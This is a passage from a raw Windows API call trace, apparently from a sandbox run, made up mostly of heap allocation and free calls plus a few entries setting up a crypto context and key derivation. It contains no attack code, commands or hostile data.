dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69888, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0131.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0131.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0131.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0131.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0131.896] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0131.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0131.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0131.897] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0131.897] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0131.898] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0131.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0131.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0131.900] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0131.900] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0131.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0131.900] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0131.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0131.901] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.901] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0131.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0131.902] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0131.902] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0131.902] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0131.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.902] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0131.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0131.902] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0131.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0131.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.902] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0131.902] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0131.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0131.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0131.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0131.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0131.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0131.903] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0131.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0131.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0131.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.904] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0131.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0131.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0131.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0131.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0131.904] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0131.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: 